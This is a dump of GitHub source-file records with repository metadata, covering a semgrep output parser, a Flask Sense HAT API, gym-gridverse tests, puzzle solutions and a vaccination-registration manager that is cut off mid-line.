0\n\n    def collect(self):\n        count = self.count_nf_connections_tracked()\n        self.publish('nf_conntrack_count', count)\n","repo_name":"Commonists/fastcci-puppet","sub_path":"modules/diamond/files/collector/nf_conntrack_counter.py","file_name":"nf_conntrack_counter.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
+{"seq_id":"11702959140","text":"soma = mil = nome = cont = menor = 0\nwhile True:\n    print('=' * 30)\n    produto = str(input('Product name: ')).title().strip()\n    preco = float(input('Price: R$'))\n    soma += preco\n    cont += 1\n    print('=' * 30)\n    continuar = ' '\n    while continuar not in 'YN':\n        continuar = str(input('Continue? 
[Y/N] ')).upper().strip()[0]\n    if preco > 1000:\n        mil += 1\n    if cont == 1 or preco < menor:\n        menor = preco\n        nome = produto\n    if continuar == 'N':\n        break\nprint('=' * 54)\nprint(f'The total for the purchase was R${soma:.2f}')\nprint(f'We have {mil} products costing more than R$1000.00')\nprint(f'The cheapest product was {nome}, which cost R${menor:.2f}')\nprint('=' * 54)\n","repo_name":"Nicolas-Lima-zz/Curso-de-Python","sub_path":"Mundos/Mundo 2/Aulas/Aula 15/ex070.py","file_name":"ex070.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"33417228184","text":"\"\"\"\nThis file encapsulates classes necessary in parsing semgrep-core\njson output into a typed object.\n\nNot everything is done here though; Some of the parsing\nof semgrep-core output is done in core_runner.py (e.g.,\nparsing and interpreting the semgrep-core profiling information).\n\nThe precise type of the response from semgrep-core is specified in\nsemgrep_interfaces/semgrep_output_v1.atd\n\"\"\"\nimport copy\nimport dataclasses\nfrom dataclasses import replace\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\n\nimport semgrep.semgrep_interfaces.semgrep_output_v1 as out\nimport semgrep.util as util\nfrom semgrep.error import FATAL_EXIT_CODE\nfrom semgrep.error import OK_EXIT_CODE\nfrom semgrep.error import SemgrepCoreError\nfrom semgrep.error import TARGET_PARSE_FAILURE_EXIT_CODE\nfrom semgrep.rule import Rule\nfrom semgrep.rule_match import CliUniqueKey\nfrom semgrep.rule_match import RuleMatch\nfrom semgrep.rule_match import RuleMatchSet\nfrom semgrep.verbose_logging import getLogger\n\nlogger = getLogger(__name__)\n\n\ndef _core_location_to_error_span(location: out.Location) -> out.ErrorSpan:\n    return out.ErrorSpan(\n        file=location.path,\n        start=location.start,\n        end=location.end,\n    )\n\n\ndef core_error_to_semgrep_error(err: out.CoreError) -> SemgrepCoreError:\n    level = err.severity\n    spans: Optional[List[out.ErrorSpan]] = None\n    if isinstance(err.error_type.value, out.PatternParseError):\n        yaml_path = err.error_type.value.value[::-1]\n        error_span = _core_location_to_error_span(err.location)\n        config_start = out.Position(line=0, col=1, offset=-1)\n        config_end = out.Position(\n            line=err.location.end.line - err.location.start.line,\n            col=err.location.end.col - err.location.start.col + 1,\n            offset=-1,\n        )\n        spans = [\n            dataclasses.replace(\n                error_span,\n                config_start=config_start,\n                config_end=config_end,\n                config_path=yaml_path,\n            )\n        ]\n    elif isinstance(err.error_type.value, out.PartialParsing):\n        # The spans for PartialParsing errors are contained in the \"error_type\" object\n        spans = [\n            _core_location_to_error_span(location)\n            for location in err.error_type.value.value\n        ]\n\n    # TODO benchmarking code relies on error code value right now\n    # See https://semgrep.dev/docs/cli-usage/ for meaning of codes\n    if isinstance(level.value, out.Info_):\n        code = OK_EXIT_CODE\n    elif (\n        isinstance(err.error_type.value, out.ParseError)\n        or isinstance(err.error_type.value, out.LexicalError)\n        or isinstance(err.error_type.value, out.PartialParsing)\n    ):\n        code = TARGET_PARSE_FAILURE_EXIT_CODE\n        err = replace(err, rule_id=None)  # Rule id not important for parse errors\n    elif isinstance(err.error_type.value, out.PatternParseError):\n        # TODO This should probably be RULE_PARSE_FAILURE_EXIT_CODE\n        # but we have been exiting with FATAL_EXIT_CODE, so we need\n        # to be deliberate about 
changing it\n code = FATAL_EXIT_CODE\n else:\n code = FATAL_EXIT_CODE\n\n return SemgrepCoreError(code, level, spans, err)\n\n\ndef core_matches_to_rule_matches(\n rules: List[Rule], res: out.CoreOutput\n) -> Dict[Rule, List[RuleMatch]]:\n \"\"\"\n Convert core_match objects into RuleMatch objects that the rest of the codebase\n interacts with.\n\n For now assumes that all matches encapsulated by this object are from the same rule\n \"\"\"\n rule_table = {rule.id: rule for rule in rules}\n\n def interpolate(\n text: str,\n metavariables: Dict[str, str],\n propagated_values: Dict[str, str],\n mask_metavariables: bool,\n ) -> str:\n \"\"\"Interpolates a string with the metavariables contained in it, returning a new string\"\"\"\n if mask_metavariables:\n for metavariable in metavariables.keys():\n metavariable_content = metavariables[metavariable]\n show_until = int(len(metavariable_content) * util.MASK_SHOW_PCT)\n masked_content = metavariable_content[:show_until] + util.MASK_CHAR * (\n len(metavariable_content) - show_until\n )\n metavariables[metavariable] = masked_content\n\n metavariable_value = propagated_values[metavariable]\n show_until = int(len(metavariable_content) * util.MASK_SHOW_PCT)\n masked_value = metavariable_value[:show_until] + util.MASK_CHAR * (\n len(metavariable_content) - show_until\n )\n propagated_values[metavariable] = masked_value\n\n # Sort by metavariable length to avoid name collisions (eg. $X2 must be handled before $X)\n for metavariable in sorted(metavariables.keys(), key=len, reverse=True):\n text = text.replace(\n \"value(\" + metavariable + \")\", propagated_values[metavariable]\n )\n text = text.replace(metavariable, metavariables[metavariable])\n\n return text\n\n def read_metavariables(\n match: out.CoreMatch,\n ) -> Tuple[Dict[str, str], Dict[str, str]]:\n matched_values = {}\n propagated_values = {}\n\n # open path and ignore non-utf8 bytes. 
https://stackoverflow.com/a/56441652\n with open(match.path.value, errors=\"replace\") as fd:\n for metavariable, metavariable_data in match.extra.metavars.value.items():\n # Offsets are start inclusive and end exclusive\n start_offset = metavariable_data.start.offset\n end_offset = metavariable_data.end.offset\n\n matched_value = util.read_range(fd, start_offset, end_offset)\n\n # Use propagated value\n if metavariable_data.propagated_value:\n propagated_value = (\n metavariable_data.propagated_value.svalue_abstract_content\n )\n else:\n propagated_value = matched_value\n\n matched_values[metavariable] = matched_value\n propagated_values[metavariable] = propagated_value\n\n return matched_values, propagated_values\n\n def convert_to_rule_match(match: out.CoreMatch) -> RuleMatch:\n rule = rule_table[match.check_id.value]\n matched_values, propagated_values = read_metavariables(match)\n\n message = match.extra.message if match.extra.message else rule.message\n message = interpolate(\n message,\n matched_values,\n propagated_values,\n isinstance(rule.product.value, out.Secrets),\n )\n\n metadata = rule.metadata\n if match.extra.metadata:\n metadata = copy.deepcopy(metadata)\n metadata.update(match.extra.metadata.value)\n\n if match.extra.fix is not None:\n fix = match.extra.fix\n else:\n fix = None\n\n return RuleMatch(\n match=match,\n extra=match.extra.to_json(),\n message=message,\n metadata=metadata,\n severity=match.extra.severity if match.extra.severity else rule.severity,\n fix=fix,\n )\n\n by_unique_key: Dict[CliUniqueKey, RuleMatch] = {}\n for match in res.results:\n rule_match = convert_to_rule_match(match)\n curr = by_unique_key.setdefault(rule_match.cli_unique_key, rule_match)\n if rule_match.should_report_instead(curr):\n by_unique_key[rule_match.cli_unique_key] = rule_match\n\n # TODO: Dict[out.RuleId, RuleMatchSet]\n findings: Dict[Rule, RuleMatchSet] = {rule: RuleMatchSet(rule) for rule in rules}\n for rule_match in by_unique_key.values():\n rule = rule_table[rule_match.rule_id]\n findings[rule].add(rule_match)\n\n # Sort results so as to guarantee the same results across different\n # runs. 
Results may arrive in a different order due to parallelism\n    # (-j option).\n    return {rule: sorted(matches) for rule, matches in findings.items()}\n","repo_name":"semgrep/semgrep","sub_path":"cli/src/semgrep/core_output.py","file_name":"core_output.py","file_ext":"py","file_size_in_byte":8123,"program_lang":"python","lang":"en","doc_type":"code","stars":9057,"dataset":"github-code","pt":"48"}
+{"seq_id":"4104841635","text":"#!/usr/bin/env python\n\nfrom flask import Flask, request\nfrom flask_cors import CORS\nimport utils         # assumed local helper providing install_pkg; the original referenced it without importing it\nimport temp_db_data  # used by the temp metric endpoint below; this import was commented out in the original\n\ntry:\n    from sense_hat import SenseHat\nexcept:\n    utils.install_pkg('sense-hat')\n    from sense_hat import SenseHat\n\nsense = SenseHat()\n\n#clear sensehat and initialise light_state\nsense.clear()\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/sensehat/temp',methods=['GET'])\ndef current_temp():\n    temp=round(sense.get_temperature(),2)\n    return str(temp)\n\n@app.route('/sensehat/temp/<metric>',methods=['GET'])\ndef temp_metric(metric):\n    if (metric == \"mean\"):\n        return str(temp_db_data.mean_temp())\n    if (metric == \"max\"):\n        return str(temp_db_data.max_temp())\n    if (metric == \"min\"):\n        return str(temp_db_data.min_temp())\n    return \"Metric not found\"\n\n@app.route('/sensehat/light',methods=['POST'])\ndef light_post():\n    state=request.args.get('state')\n    print(state)\n    if (state==\"on\"):\n        sense.clear(255,255,255)\n        return '{\"state\":\"on\"}'\n    else:\n        sense.clear(0,0,0)\n        return '{\"state\":\"off\"}'\n\n@app.route('/sensehat/light',methods=['GET'])\ndef light_get():\n    #check top left pixel value (==0 - off, >0 - on)\n    print(sense.get_pixel(0, 0))\n    if sense.get_pixel(0, 0)[0] == 0:\n        return '{\"state\":\"off\"}'\n    else:\n        return '{\"state\":\"on\"}'\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"noelmcloughlin/iot-edge-stepping-stones","sub_path":"webapi/sense_api.py","file_name":"sense_api.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
+{"seq_id":"9756921760","text":"import matplotlib.pyplot as plt\nimport csv\nimport numpy as np\n\nmin_tape_width = 10\nmax_tape_width = 25\n\nwith open('analysis.csv', 'r') as file:\n    reader = csv.DictReader(file)\n\n    input_compressions = []\n    output_compressions = []\n\n    for row in reader:\n        input_compression = 1 - float(row['input_compression'])\n        output_compression = 1 - float(row['output_compression'])\n\n        tape_size = int(row['img_and_tape_width'])\n\n        if min_tape_width <= tape_size <= max_tape_width:\n            input_compressions.append(input_compression)\n            output_compressions.append(output_compression)\n\n# c='#00C894'\nplt.scatter(input_compressions, output_compressions, c='#00C894', s=0.1, label='Data Points')\nplt.xlabel('Input compression ratio')\nplt.ylabel('Output compression ratio')\n# plt.title('Scatterplot of tape width vs. 
compression ratio')\nplt.tight_layout()\n\nplt.title('')\nplt.suptitle('')\nplt.tight_layout()\n\n# Display the plot\nplt.show()\n","repo_name":"marmaladian/flatypi","sub_path":"plot_input_vs_output_compression.py","file_name":"plot_input_vs_output_compression.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70900977426","text":"import glob\nfrom typing import List, Optional, Sequence, Type, Union\n\nimport pytest\n\nfrom gym_gridverse.action import Action\nfrom gym_gridverse.agent import Agent\nfrom gym_gridverse.envs.yaml import factory as yaml_factory\nfrom gym_gridverse.geometry import Area, Orientation, Position, Shape\nfrom gym_gridverse.grid import Grid\nfrom gym_gridverse.grid_object import (\n Color,\n Door,\n Exit,\n Floor,\n GridObject,\n Key,\n Wall,\n)\nfrom gym_gridverse.observation import Observation\nfrom gym_gridverse.spaces import (\n ActionSpace,\n ObservationSpace,\n _max_color_index,\n _max_object_status,\n _max_object_type,\n)\n\n\n# TODO: bad test; implementation detail\n@pytest.mark.parametrize(\n 'colors,expected',\n [\n ([Color.NONE], Color.NONE.value),\n ([Color.NONE, Color.RED], Color.RED.value),\n ([Color.NONE, Color.RED, Color.GREEN], Color.GREEN.value),\n (\n [Color.NONE, Color.RED, Color.GREEN, Color.BLUE],\n Color.BLUE.value,\n ),\n (\n [Color.NONE, Color.RED, Color.GREEN, Color.BLUE, Color.YELLOW],\n Color.YELLOW.value,\n ),\n ],\n)\ndef test_max_color_index(colors: Sequence[Color], expected: int):\n assert _max_color_index(colors) == expected\n\n\n# TODO: bad test; implementation detail\n@pytest.mark.parametrize(\n 'object_types,expected',\n [\n ([Floor, Exit], Floor.num_states()),\n ([Floor, Exit, Door], Door.num_states()),\n ],\n)\ndef test_max_object_status(\n object_types: Sequence[Type[GridObject]], expected: int\n):\n assert _max_object_status(object_types) == expected\n\n\n# TODO: bad test; implementation detail\n@pytest.mark.parametrize(\n 'object_types,expected',\n [\n ([Floor, Exit], Exit.type_index()),\n ([Floor, Exit, Door], Door.type_index()),\n ],\n)\ndef test_max_object_type(\n object_types: Sequence[Type[GridObject]], expected: int\n):\n assert _max_object_type(object_types) == expected\n\n\n@pytest.mark.parametrize(\n 'action_space,expected_contains,expected_not_contains',\n [\n (\n ActionSpace(list(Action)),\n [\n Action.MOVE_FORWARD,\n Action.MOVE_BACKWARD,\n Action.MOVE_LEFT,\n Action.MOVE_RIGHT,\n Action.TURN_LEFT,\n Action.TURN_RIGHT,\n Action.ACTUATE,\n Action.PICK_N_DROP,\n ],\n [],\n ),\n (\n ActionSpace(\n [\n Action.MOVE_FORWARD,\n Action.MOVE_BACKWARD,\n Action.MOVE_LEFT,\n Action.MOVE_RIGHT,\n ]\n ),\n [\n Action.MOVE_FORWARD,\n Action.MOVE_BACKWARD,\n Action.MOVE_LEFT,\n Action.MOVE_RIGHT,\n ],\n [\n Action.TURN_LEFT,\n Action.TURN_RIGHT,\n Action.ACTUATE,\n Action.PICK_N_DROP,\n ],\n ),\n ],\n)\ndef test_action_space_contains(\n action_space: ActionSpace,\n expected_contains: Sequence[Action],\n expected_not_contains: Sequence[Action],\n):\n assert action_space.num_actions == len(expected_contains)\n\n for action in expected_contains:\n assert action_space.contains(action)\n\n for action in expected_not_contains:\n assert not action_space.contains(action)\n\n\n@pytest.mark.parametrize(\n 'shape,expected',\n [\n (Shape(2, 5), Area((-1, 0), (-2, 2))),\n (Shape(3, 5), Area((-2, 0), (-2, 2))),\n (Shape(2, 7), Area((-1, 0), (-3, 3))),\n (Shape(3, 7), Area((-2, 0), (-3, 3))),\n ],\n)\ndef test_observation_space_area(shape: 
Shape, expected: Area):\n observation_space = ObservationSpace(shape, [], [])\n assert observation_space.area == expected\n\n\n@pytest.mark.parametrize(\n 'shape,expected',\n [\n (Shape(2, 5), Position(1, 2)),\n (Shape(3, 5), Position(2, 2)),\n (Shape(2, 7), Position(1, 3)),\n (Shape(3, 7), Position(2, 3)),\n ],\n)\ndef test_observation_space_agent_position(shape: Shape, expected: Position):\n observation_space = ObservationSpace(shape, [], [])\n assert observation_space.agent_position == expected\n\n\ndef space_contains_observation(\n space_shape: Shape = Shape(2, 5),\n space_objs: Sequence[Type[GridObject]] = [Floor],\n space_colors: Sequence[Color] = [],\n grid: Grid = Grid.from_shape((2, 5)),\n agent_obj: Union[GridObject, None] = None,\n agent_pos: Position = Position(0, 0),\n orientation: Orientation = Orientation.F,\n):\n \"\"\"helper function to test whether space contains obs given inputs\"\"\"\n observation_space = ObservationSpace(space_shape, space_objs, space_colors)\n obs = Observation(grid, Agent(agent_pos, orientation, agent_obj))\n\n return observation_space.contains(obs)\n\n\n@pytest.mark.parametrize(\n 'space_shape,observation_shape,agent_position,expected',\n [\n (Shape(2, 3), Shape(2, 3), Position(1, 1), True),\n (Shape(4, 5), Shape(4, 5), Position(3, 2), True),\n # invalid\n (Shape(2, 3), Shape(2, 5), Position(1, 2), False),\n (Shape(2, 3), Shape(3, 3), Position(2, 1), False),\n (Shape(4, 5), Shape(4, 7), Position(3, 3), False),\n (Shape(4, 5), Shape(5, 5), Position(4, 2), False),\n ],\n)\ndef test_observation_space_contains__shape(\n space_shape: Shape,\n observation_shape: Shape,\n agent_position: Position,\n expected: bool,\n):\n observation_space = ObservationSpace(space_shape, [Floor], [Color.NONE])\n observation = Observation(\n Grid.from_shape(observation_shape),\n Agent(agent_position, Orientation.F),\n )\n\n assert observation_space.contains(observation) == expected\n\n\n@pytest.mark.parametrize(\n 'space_object_types,observation_objects,agent_grid_object,expected',\n [\n ([Floor], [[Floor(), Floor(), Floor()]], None, True),\n ([Floor, Wall], [[Floor(), Floor(), Floor()]], None, True),\n ([Floor, Wall], [[Floor(), Floor(), Wall()]], None, True),\n ([Floor, Wall], [[Floor(), Floor(), Floor()]], Wall(), True),\n # invalid\n ([Floor], [[Floor(), Floor(), Wall()]], None, False),\n ([Floor], [[Floor(), Floor(), Wall()]], Wall(), False),\n ],\n)\ndef test_observation_space_contains__object_types(\n space_object_types: Sequence[Type[GridObject]],\n observation_objects: List[List[GridObject]],\n agent_grid_object: Optional[GridObject],\n expected: bool,\n):\n # NOTE: observation_objects should have shape (1, 3)\n observation_space = ObservationSpace(\n Shape(1, 3), space_object_types, [Color.NONE]\n )\n observation = Observation(\n Grid(observation_objects),\n Agent(Position(0, 1), Orientation.F, agent_grid_object),\n )\n\n assert observation_space.contains(observation) == expected\n\n\n@pytest.mark.parametrize(\n 'space_colors,observation_objects,agent_grid_object,expected',\n [\n ([Color.RED], [[Key(Color.RED)], [Key(Color.RED)]], None, True),\n (\n [Color.RED, Color.BLUE],\n [[Key(Color.RED)], [Key(Color.BLUE)]],\n None,\n True,\n ),\n (\n [Color.RED, Color.BLUE],\n [[Key(Color.RED)], [Key(Color.RED)]],\n Key(Color.BLUE),\n True,\n ),\n # invalid\n ([Color.RED], [[Key(Color.RED)], [Key(Color.BLUE)]], None, False),\n (\n [Color.RED],\n [[Key(Color.RED)], [Key(Color.RED)]],\n Key(Color.BLUE),\n False,\n ),\n ],\n)\ndef test_observation_space_contains__colors(\n 
space_colors: Sequence[Color],\n observation_objects: List[List[GridObject]],\n agent_grid_object: Optional[GridObject],\n expected: bool,\n):\n # NOTE: observation_objects should have shape (2, 1)\n observation_space = ObservationSpace(Shape(2, 1), [Key], space_colors)\n observation = Observation(\n Grid(observation_objects),\n Agent(Position(1, 0), Orientation.F, agent_grid_object),\n )\n\n assert observation_space.contains(observation) == expected\n\n\n@pytest.mark.parametrize(\n 'shape,position,position_ok',\n [\n (Shape(1, 3), Position(0, 1), True),\n (Shape(2, 5), Position(1, 2), True),\n # invalid\n (Shape(1, 3), Position(-1, -1), False),\n (Shape(1, 3), Position(1, 3), False),\n (Shape(2, 5), Position(-1, -1), False),\n (Shape(2, 5), Position(2, 5), False),\n ],\n)\n@pytest.mark.parametrize(\n 'orientation,orientation_ok',\n [\n (Orientation.F, True),\n # all orientations are valid now\n (Orientation.B, True),\n (Orientation.R, True),\n (Orientation.L, True),\n ],\n)\ndef test_observation_space_contains__agent_transform(\n shape: Shape,\n position: Position,\n position_ok: bool,\n orientation: Orientation,\n orientation_ok: bool,\n):\n observation_space = ObservationSpace(shape, [Floor], [Color.NONE])\n observation = Observation(\n Grid.from_shape(shape), Agent(position, orientation)\n )\n\n expected = position_ok and orientation_ok\n assert observation_space.contains(observation) == expected\n\n\n@pytest.mark.parametrize(\n 'shape',\n [\n Shape(2, 3),\n Shape(4, 5),\n ],\n)\n@pytest.mark.parametrize(\n 'object_types',\n [\n [Floor],\n [Floor, Wall],\n ],\n)\n@pytest.mark.parametrize(\n 'colors',\n [\n [Color.NONE],\n [Color.NONE, Color.RED],\n ],\n)\n@pytest.mark.parametrize(\n 'position',\n [\n Position(0, 0),\n Position(0, 1),\n Position(1, 0),\n Position(1, 1),\n ],\n)\n@pytest.mark.parametrize(\n 'orientation',\n [Orientation.F],\n)\ndef test_observation_space_contains(\n shape: Shape,\n object_types: Sequence[Type[GridObject]],\n colors: Sequence[Color],\n position: Position,\n orientation: Orientation,\n):\n observation_space = ObservationSpace(shape, object_types, colors)\n observation = Observation(\n Grid.from_shape(shape), Agent(position, orientation)\n )\n\n assert observation_space.contains(observation)\n\n\n# NOTE testing of Space.contains methods for all yaml files in yaml/\n@pytest.mark.parametrize('path', glob.glob('yaml/*.yaml'))\ndef test_space_contains_from_yaml(path: str):\n env = yaml_factory.factory_env_from_yaml(path)\n\n state = env.functional_reset()\n env.state_space.contains(state)\n\n observation = env.functional_observation(state)\n env.observation_space.contains(observation)\n","repo_name":"abaisero/gym-gridverse","sub_path":"tests/test_spaces.py","file_name":"test_spaces.py","file_ext":"py","file_size_in_byte":10545,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"4763186851","text":"#######################\n# Stephen Boyett\n# Advent of Code\n# Day 11, Part 2\n# 1/3/2021\n########################\n\nclass seatingChart:\n\n\tdef __init__(self, seats):\n\t\tself.rowlen = len(seats[0])\n\t\tself.num_rows = len(seats)\n\t\tself.seats = {(r, s): state for r, row in enumerate(seats) for s, state in enumerate(row) if state != \".\"}\n\t\tself.visible = {s: self.find_visible_seats(s) for s in self.seats.keys()}\n\n\tdef find_adj_seats(self, seat):\n\t\treturn [(r,s) for r in range(seat[0]-1, seat[0]+2) for s in range(seat[1]-1, seat[1]+2) \n\t\t\t\tif (r,s) != seat and (r,s) in 
self.seats.keys()]\n\n\tdef find_visible_seats(self, seat):\n\t\tlst = []\n\t\t(r, s) = seat\n\t\twhile s >= 0:\n\t\t\ts -= 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s < self.rowlen:\n\t\t\ts += 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile r >= 0:\n\t\t\tr -= 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile r < self.num_rows:\n\t\t\tr += 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s >= 0 and r >= 0:\n\t\t\ts -= 1\n\t\t\tr -= 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s < self.rowlen and r < self.num_rows:\n\t\t\ts += 1\n\t\t\tr += 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s >= 0 and r < self.num_rows:\n\t\t\ts -= 1\n\t\t\tr += 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\t(r,s) = seat\n\t\twhile s < self.rowlen and r >= 0:\n\t\t\ts += 1\n\t\t\tr -= 1\n\t\t\tif (r, s) in self.seats.keys():\n\t\t\t\tlst.append((r,s))\n\t\t\t\tbreak\n\t\treturn lst\n\n\n\tdef occupied(self, seat):\n\t\treturn (self.seats[seat] == \"#\")\n\n\tdef crowded(self, seat):\n\t\treturn (sum([1 for s in self.visible[seat] if self.occupied(s)]) >= 5)\n\n\tdef spacious(self, seat):\n\t\treturn (not any([1 for s in self.visible[seat] if self.occupied(s)]))\n\n\tdef update(self):\n\t\tchange_list = []\n\t\tfor seat, state, in self.seats.items():\n\t\t\tif state == '#' and self.crowded(seat):\n\t\t\t\tchange_list.append(seat)\n\t\t\telif state == 'L' and self.spacious(seat):\n\t\t\t\tchange_list.append(seat)\n\t\tfor s in change_list:\n\t\t\tself.seats[s] = '#' if self.seats[s] == 'L' else 'L'\n\ndef main():\n\twith open(\"day11_input\", \"r\") as f:\n\t\tseats = [[s for s in r] for r in f.read().splitlines()]\n\n\tprev = {}\n\tcount = 0\n\tSC = seatingChart(seats)\n\n\twhile(prev != SC.seats):\n\t\tcount += 1\n\t\tprev = SC.seats.copy()\n\t\tSC.update()\n\tprint(f\"# of occupied seats: {list(SC.seats.values()).count('#')}\")\n\t\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"sboyett31/AdventOfCode2020","sub_path":"Day11/day11_2.py","file_name":"day11_2.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8618459822","text":"# pylint: disable=R0904\n# pylint: disable=R0913\n# pylint: disable-msg=too-many-locals\n# pylint: disable-msg=too-many-branches\n# pylint: disable-msg=too-many-statements\n\"\"\"\n\nModule for the management of the vaccination process\n\n\"\"\"\nimport re\nimport json\nfrom datetime import datetime\nfrom pathlib import Path\nfrom freezegun import freeze_time\nfrom .vaccine_management_exception import VaccineManagementException\nfrom .vaccine_patient_register import VaccinePatientRegister\nfrom .vaccination_appoinment import VaccinationAppoinment\n\nclass VaccineManager:\n \"\"\"\n\n Class for providing the methods for managing the vaccination process\n\n \"\"\"\n def __init__(self):\n \"\"\"\n\n Constructor (with pass function)\n\n \"\"\"\n\n @staticmethod\n def validate_guid(patient_id):\n \"\"\"\n\n Return True if the GUID v4 is right, or false in other case\n\n \"\"\"\n valid_guid = re.compile (r'^[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-'\n 
r'[0-9A-F]{12}$', re.IGNORECASE)\n valid_guid4 = re.compile(r'^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-'\n r'[0-9A-F]{12}$', re.IGNORECASE)\n check_guid = valid_guid.fullmatch(patient_id)\n check_guid_version = valid_guid4.fullmatch(patient_id)\n if not check_guid:\n raise VaccineManagementException(\"Error: invalid UUID\")\n if not check_guid_version:\n raise VaccineManagementException(\"Error: invalid UUID version\")\n return True\n\n\n @staticmethod\n def validate_date_signature(patient_sys_id):\n \"\"\"\n\n Returns True if the patient's date_signature is fully validated\n\n \"\"\"\n # Check data type\n if not patient_sys_id or type(patient_sys_id) != str:\n raise VaccineManagementException(\"Error: invalid Patient's date_signature' \"\n \"--> Signature's data type is not String\")\n\n # Check the length of the signature (must be exactly 64 bytes)\n patient_sys_id_length = len(patient_sys_id)\n if patient_sys_id_length != 64:\n raise VaccineManagementException(\"Error: invalid Patient's date_signature \"\n \"--> Signature must have 64 bytes\")\n\n # Check the structure with regex\n valid_signature_regex = re.compile(r'[0-9a-f]{64}', re.IGNORECASE)\n check_signature = valid_signature_regex.fullmatch(patient_sys_id)\n if not check_signature:\n raise VaccineManagementException(\"Error: invalid Patient's date_signature' \"\n \"--> Signature does not match with regex\")\n return True\n\n\n def request_vaccination_id(self, patient_id, registration_type,\n name_surname, phone_number, age):\n \"\"\"\n\n Method that validates a patient's data for vaccination\n\n \"\"\"\n\n # First we deal with errors related to patient_id\n if not patient_id or type(patient_id) != str:\n raise VaccineManagementException(\"Error: invalid UUID\")\n\n # It checks if patient_id is a valid UUID v4\n # If there are no errors, continue with the execution\n self.validate_guid(patient_id)\n\n # registration_type errors\n if registration_type != \"Regular\" and registration_type != \"Familiar\":\n raise VaccineManagementException(\"Error: registration_type must be \"\n \"'Familiar' or 'Regular'\")\n\n # name_surname errors\n if not name_surname or type(name_surname) != str:\n raise VaccineManagementException(\"Error: wrong name format\")\n if len(name_surname) > 30:\n raise VaccineManagementException(\"Error: name is too long\")\n\n # Checks if it suits the regex \"formula\"\n good_name = re.compile(r'\\w+\\s\\w+')\n test_name = good_name.fullmatch(name_surname)\n if not test_name:\n raise VaccineManagementException(\"Error: wrong name format\")\n\n # phone_number errors\n if not phone_number or type(phone_number) != str:\n raise VaccineManagementException(\"Error: invalid phone number format\")\n if len(phone_number) != 9:\n raise VaccineManagementException(\"Error: number must contain \"\n \"9 characters and only digits\")\n good_number = re.compile(r\"[0-9]{9}\")\n test_number = good_number.fullmatch(phone_number)\n if not test_number:\n raise VaccineManagementException(\"Error: number must contain \"\n \"9 characters and only numerals\")\n\n # age errors\n if not age or type(age) != str:\n raise VaccineManagementException(\"Error: invalid age format\")\n good_age = re.compile(r\"^\\d+$\")# Age has only two numbers\n test_age = good_age.fullmatch(age)\n if not test_age:\n raise VaccineManagementException(\"Error: invalid age format\")\n if int(age) not in range (6, 126):\n raise VaccineManagementException(\"Error: age must be between 6 and 125\")\n\n new_client = VaccinePatientRegister(patient_id, 
name_surname,\n registration_type, phone_number, age)\n\n # Checks if the patient is already registered in the system\n json_path = str(Path.home()) + \"/PycharmProjects/G80.2022.T10.EG3/src/JsonFiles/\"\n file_store = json_path + \"store_patient.json\"\n\n try:\n with open(file_store, 'r', encoding=\"utf-8\", newline=\"\") as file:\n data_list = json.load(file)\n except FileNotFoundError:\n data_list = []\n except json.JSONDecodeError:\n raise VaccineManagementException(\"JSON Decode Error - Wrong JSON Format\")\n found = False\n for item in data_list:\n if item[\"_VaccinePatientRegister__patient_id\"] == patient_id:\n if (item[\"_VaccinePatientRegister__registration_type\"] == \\\n registration_type) and (item[\"_VaccinePatientRegister__full_name\"] ==\n name_surname):\n found = True\n if found:\n raise VaccineManagementException(\"Error: patient ID already registered\")\n\n # If we reach here, the patient is not in the system, so we add him\n data_list.append(new_client.__dict__)\n try:\n with open(file_store, \"w\", encoding=\"utf-8\", newline=\"\") as file:\n json.dump(data_list, file, indent=2)\n except:\n raise VaccineManagementException(\"Wrong file or path\")\n return new_client.get_patient_system_id()\n\n\n def get_vaccine_date(self, input_file):\n \"\"\"\n\n Method that returns a 64-byte hash of the date\n\n \"\"\"\n json_path = str(Path.home()) + \"/PycharmProjects/G80.2022.T10.EG3/src/JsonFiles/\"\n file_store = json_path + \"store_patient.json\"\n\n # We open the input file to check the data\n\n with open(input_file, \"r\", encoding=\"utf-8\", newline=\"\") as file:\n try:\n patient_data = json.load(file)\n except:\n raise VaccineManagementException(\"Wrong json file format\")\n\n #############################CHECKS#############################\n\n if type(patient_data) != dict or len(patient_data.keys()) < 2:\n raise VaccineManagementException(\"Wrong json file format\")\n dict_keys = 